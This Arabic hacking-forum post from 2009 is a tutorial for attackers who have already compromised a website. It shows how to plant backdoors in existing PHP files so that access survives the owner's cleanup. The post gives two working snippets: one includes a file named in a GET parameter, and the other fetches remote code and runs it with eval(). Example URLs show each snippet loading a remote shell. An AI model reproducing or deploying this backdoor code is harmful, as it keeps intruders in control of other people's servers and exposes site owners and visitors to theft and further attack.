عرض مشاركة واحدة
قديم 09-15-2009, 02:02 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي تلغيم ملفات php لضمان الرجوع الى السيرفر فيما بعد


السلام عليكم ورحمه الله وبركاته



اليوم معانا شرح بسيط للتلغيم


لو انت مخترق موقع وناوي ترجع له وتضل ملزق بصاحبه

فامشي معي

انت الان رافع شل
اوك
لو رحنا غيرنا الاندكس
رح يجي صاحب الموقع :grr:
وبعديها يقيم الاندكس :a41:
ويضع اندكس السكربت من جديد والخساره قليله
ويصير موقعه
:00001806[1]:


الحل انلغم ملف من ملفاته
وهو رح يعمل فحص ويمسح شلاتك
ورح يرفع الاندكس الخاص بالسكربت
:21:

فتيجي للتلغيم كيف نعمله

في عنا طريقتي
حسب اصدار البي اتش بي

شوف الاولى
في حال اصدار البي اتش بي 4

كود PHP:
<?php 

$Volc4no 
$_GET['r57'

include (
$Volc4no); 

?>
نآخذ الكود ونحطه في اي ملف php موجود على السيرفر .. وبعدها بيكون الاستغلال كذا

http://www.xxx.com/XX/file.php?r57=http://shell.txt

file.php = الملف الي لغمته بالكود ..

............ هذا للاصدارات php 4.x.x ..


عنا الاصدار خمسه

نفس القصص الطرمه

كود PHP:


 <?php 
if($_GET[t0v]){ 
$file=implode("\n",file($_GET[t0v])); 
$t0v=str_replace("<?php""",$file); 
$t0v=str_replace("<?""",$t0v); 
$t0v=str_replace("?>""",$t0v); 
eval(
$t0v); 

?>
نآخذ الكود ونحطه دآخل اي ملف php موجود عالسيرفر على حسب صلاحياتك في التعديل ..
وبيكون الاستغلال ..

http://www.xxx.com/XX/file.php?t0v=http//shell.txt



موفقين




jgydl lgthj php gqlhk hgv[,u hgn hgsdvtv tdlh fu]

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس